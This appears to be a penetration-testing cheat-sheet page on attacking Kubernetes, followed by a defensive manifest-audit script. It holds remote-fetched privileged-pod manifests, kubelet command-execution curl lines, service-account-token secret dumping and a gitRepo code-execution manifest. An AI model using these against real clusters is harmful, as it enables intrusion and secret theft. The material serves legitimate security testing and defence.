Kubernetes

Kubernetes, often abbreviated as K8s, is an open-source container orchestration platform designed to automate the deployment, scaling, and management of containerized applications.

Tools

  • BishopFox/badpods - A collection of manifests that will create pods with elevated privileges.
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv/pod/priv-exec-pod.yaml
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml
    kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml
    
  • serain/kubelet-anon-rce - Executes commands in a container on a kubelet endpoint that allows anonymous authentication
  • DataDog/KubeHound - Kubernetes Attack Graph
    # Critical paths enumeration
    kh.containers().criticalPaths().count()
    kh.containers().dedup().by("name").criticalPaths().count()
    kh.endpoints(EndpointExposure.ClusterIP).criticalPaths().count()
    kh.endpoints(EndpointExposure.NodeIP).criticalPaths().count()
    kh.endpoints(EndpointExposure.External).criticalPaths().count()
    kh.services().criticalPaths().count()
    
    # DNS services and port
    kh.endpoints(EndpointExposure.External).criticalPaths().limit(local,1)
    .dedup().valueMap("serviceDns","port")
    .group().by("serviceDns").by("port")
    

Exploits

Accessible kubelet on 10250/TCP

Requirements:

  • --anonymous-auth=true: enables anonymous requests to the kubelet server (the kubelet's authorization mode must also allow them, e.g. AlwaysAllow; with Webhook authorization the API server's RBAC decides)

Exploit:

  • Getting pods: curl -ks https://worker:10250/pods
  • Run commands: curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} -d 'input=1' -d 'output=1' -d 'tty=1' -d 'command=ls' -d 'command=/'

Obtaining Service Account Token

The token is mounted into each pod at /var/run/secrets/kubernetes.io/serviceaccount/token (unless automountServiceAccountToken is disabled for the pod or service account)

Use the service account token:

  • on the kube-apiserver API: curl -ks -H "Authorization: Bearer <TOKEN>" https://master:6443/api/v1/namespaces/{namespace}/secrets
  • with kubectl: kubectl --insecure-skip-tls-verify=true --server="https://master:6443" --token="<TOKEN>" get secrets --all-namespaces -o json

Create gitRepo Volumes to Execute Code

Requirements:

  • gitRepo volume type enabled (deprecated since Kubernetes 1.11, but still honoured by the kubelet where the plugin is available)
  • create rights on pods

Exploit:

apiVersion: v1
kind: Pod
metadata:
  name: test-pd
spec:
  containers:
  - image: alpine:latest
    command: ["sleep","86400"]
    name: test-container
    volumeMounts:
    - mountPath: /gitrepo
      name: gitvolume
  volumes:
  - name: gitvolume
    gitRepo:
      directory: g/.git
      repository: https://github.com/raesene/repopodexploit.git
      revision: main
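A defender-side audit of pod manifests, added here as an example that is not part of the original page: it flags the settings the badPods manifests listed above rely on (hostPID, hostNetwork, hostIPC, hostPath, privileged, added capabilities) and gitRepo volumes, including the directory-with-.git pattern the manifest above uses. The manifests are embedded as the dicts yaml.safe_load() would produce, so no YAML library is needed; PRIV_HOSTPID_POD is a constructed sample, not a badPods file.

```python
from typing import Any

# Constructed sample: the page's gitRepo manifest, written out as the dict that
# yaml.safe_load() would return (kept inline so the example runs without PyYAML).
GITREPO_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "test-pd"},
    "spec": {
        "containers": [{"name": "test-container", "image": "alpine:latest",
                        "command": ["sleep", "86400"],
                        "volumeMounts": [{"mountPath": "/gitrepo", "name": "gitvolume"}]}],
        "volumes": [{"name": "gitvolume",
                     "gitRepo": {"directory": "g/.git",
                                 "repository": "https://github.com/raesene/repopodexploit.git",
                                 "revision": "main"}}],
    },
}

# Constructed sample in the spirit of the badPods priv-and-hostpid manifest (not the real file).
PRIV_HOSTPID_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "priv-and-hostpid"},
    "spec": {"hostPID": True,
             "containers": [{"name": "c", "image": "alpine:latest",
                             "securityContext": {"privileged": True}}]},
}

DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "NET_ADMIN", "DAC_READ_SEARCH"}


def audit_pod(manifest: dict[str, Any]) -> list[str]:
    """Return one finding per pod setting that weakens the container/node boundary."""
    spec = manifest.get("spec", {})
    findings: list[str] = []
    for flag in ("hostPID", "hostNetwork", "hostIPC"):      # host namespace sharing
        if spec.get(flag) is True:
            findings.append(f"{flag}=true")
    for vol in spec.get("volumes", []):
        if "hostPath" in vol:                                  # node filesystem access
            findings.append(f"hostPath volume {vol['name']} -> {vol['hostPath'].get('path')}")
        if "gitRepo" in vol:                                   # deprecated in-tree git clone
            directory = vol["gitRepo"].get("directory", "")
            suffix = " (directory contains a .git component)" if ".git" in directory.split("/") else ""
            findings.append(f"gitRepo volume {vol['name']}{suffix}")
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        sc = c.get("securityContext") or {}
        if sc.get("privileged") is True:                       # all capabilities, device access
            findings.append(f"container {c['name']} privileged=true")
        caps = DANGEROUS_CAPS & set(sc.get("capabilities", {}).get("add", []))
        if caps:
            findings.append(f"container {c['name']} adds {sorted(caps)}")
    return findings
```

Run it against a directory of manifests (yaml.safe_load each file, then audit_pod) before applying them; a Pod Security Admission policy at the baseline or restricted level rejects the same settings at admission time.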

References